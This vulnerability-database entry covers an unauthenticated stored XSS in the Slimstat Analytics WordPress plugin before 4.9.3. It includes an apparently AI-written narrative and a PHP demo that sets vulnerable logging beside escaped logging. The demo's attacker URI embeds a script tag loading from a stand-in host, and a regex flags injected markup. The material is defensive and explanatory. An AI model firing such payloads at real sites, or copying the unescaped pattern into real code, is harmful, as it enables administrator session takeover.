Slimstat Analytics < 4.9.3 - Unauthenticated Stored XSS
Description
The Slimstat Analytics WordPress plugin before 4.9.3 does not sanitise or escape the request URI when logging requests, which could allow unauthenticated attackers to perform Stored Cross-Site Scripting attacks against logged-in admins viewing the logs.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Unauthenticated stored XSS in the Slimstat Analytics WordPress plugin before 4.9.3: the request URI is logged unsanitized and later rendered, unescaped, to administrators viewing the logs.
Vulnerability
The Slimstat Analytics WordPress plugin, in versions before 4.9.3, does not sanitize or escape the URI it logs for each HTTP request, and the stored value is later rendered in the plugin's reports. An unauthenticated attacker can therefore place HTML or JavaScript in the URI of a request, and the plugin stores that markup verbatim in its request logs. Any site running a version prior to 4.9.3 is affected [1].
Exploitation
An unauthenticated attacker sends a request whose URI carries a script payload (e.g., a `<script>` tag in the path or query string). The plugin logs the URI as received. When a logged-in administrator later opens the request logs in the WordPress admin panel, the stored payload is rendered unescaped and executes in the administrator's browser. The attacker needs no account or privileges; the only user interaction required is an administrator viewing the logs [1].
Impact
Successful exploitation yields Stored Cross-Site Scripting in the context of the administrator's session. With script running inside wp-admin, the attacker can issue requests carrying the admin's cookies and nonces and so perform any action the admin can, such as creating an additional administrator account, installing a plugin, or altering site content, as well as defacing the admin interface. WordPress marks its authentication cookies HttpOnly, so the practical route is riding the admin's session from within the page rather than stealing the cookies. The payload only fires for users who view the logs, but because those users are administrators, full site compromise is possible [1].
Mitigation
Update Slimstat Analytics to version 4.9.3 or later, which fixes the issue by sanitizing and escaping the URI before it is logged. The fix was released on or before 2022-12-19 [1]. No workarounds are documented, so applying the update is the recommended mitigation. After updating, also check whether entries logged before the update still contain markup and render unescaped in the reports; if they do, purge the stored request data rather than relying on the fix to clean it retroactively.
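The following standalone PHP is an added illustration, not Slimstat's own code, of the logging pipeline described in the Vulnerability and Exploitation sections and of the escaping fix and post-update check discussed under Mitigation. It models the request log as an in-memory array, shows the vulnerable store-raw/echo-raw pair beside a hardened sanitize-on-write/escape-on-output pair, and includes a triage heuristic for rows logged before a fix. Function names, the log structure and the attacker URI are constructed for the example; `htmlspecialchars()` stands in for WordPress's `esc_html()` so the script runs outside WordPress.

```php
<?php
// Added example (not the plugin's code): a minimal model of a request logger
// that stores the URI and renders it in an admin report.
declare(strict_types=1);

// Constructed attacker request. The payload sits in the query string, so an
// unauthenticated client can get it logged just by sending the request.
// (curl sends '<' raw; browsers percent-encode it, and whether a decoded form
// reaches the log depends on the logging code.)
const ATTACKER_URI = '/index.php?s=<script src="https://attacker.example/x.js"></script>';

/** Vulnerable: store REQUEST_URI exactly as received. */
function log_request_vulnerable(array &$log, string $uri): void
{
    $log[] = ['resource' => $uri];
}

/** Vulnerable: build the report cell by concatenation, no escaping. */
function render_row_vulnerable(array $row): string
{
    return '<td>' . $row['resource'] . '</td>';
}

/** Fixed (defence in depth): drop tags and control characters before storing. */
function log_request_fixed(array &$log, string $uri): void
{
    $clean = strip_tags($uri);
    $clean = preg_replace('/[\x00-\x1F\x7F]/', '', $clean) ?? '';
    $log[] = ['resource' => $clean];
}

/** Fixed (the control that matters): escape at the HTML output boundary.
 *  In a WordPress plugin this is esc_html(); htmlspecialchars() is used here
 *  so the script runs stand-alone. */
function render_row_fixed(array $row): string
{
    $escaped = htmlspecialchars($row['resource'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<td>' . $escaped . '</td>';
}

/** Triage heuristic for rows logged before the fix: flag anything that looks
 *  like a tag, a javascript: URL or an on*= event handler. Expect some false
 *  positives; review the hits rather than acting on them blindly. */
function find_suspicious_entries(array $log): array
{
    return array_values(array_filter($log, static function (array $row): bool {
        return preg_match('/<\s*\/?\s*[a-z]|javascript\s*:|\bon[a-z]+\s*=/i', $row['resource']) === 1;
    }));
}

// --- Demonstration ---------------------------------------------------------

$vulnLog = [];
log_request_vulnerable($vulnLog, ATTACKER_URI);
echo "Vulnerable render (payload reaches the admin's browser intact):\n";
echo render_row_vulnerable($vulnLog[0]), "\n\n";

$fixedLog = [];
log_request_fixed($fixedLog, ATTACKER_URI);
echo "Fixed render (sanitised on write, escaped on output):\n";
echo render_row_fixed($fixedLog[0]), "\n\n";

// Output escaping alone also neutralises rows the vulnerable logger stored,
// which is why escaping at render time is the primary control.
echo "Old row rendered through the fixed renderer:\n";
echo render_row_fixed($vulnLog[0]), "\n\n";

// Post-update check: how many already-stored rows carry markup?
$hits = find_suspicious_entries($vulnLog);
echo 'Suspicious stored rows: ', count($hits), "\n";
foreach ($hits as $row) {
    echo '  ', $row['resource'], "\n";
}
```

Save the script under any name and run it with `php`. The first cell echoes the `<script>` element verbatim, which is the stored XSS; the second and third show that escaping at output time is what stops it, whether or not the row was sanitized when written. The same heuristic in `find_suspicious_entries()` can be pointed at rows exported from the real log table to decide whether pre-update data needs purging.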
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- WordPress / Slimstat Analytics
  - Range: <4.9.3
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
[1] wpscan.com/vulnerability/b1aef75d-0c84-4702-83fc-11f0e98a0821 (mitre, exploit, vdb-entry, technical-description)
News mentions
No linked articles in our index yet.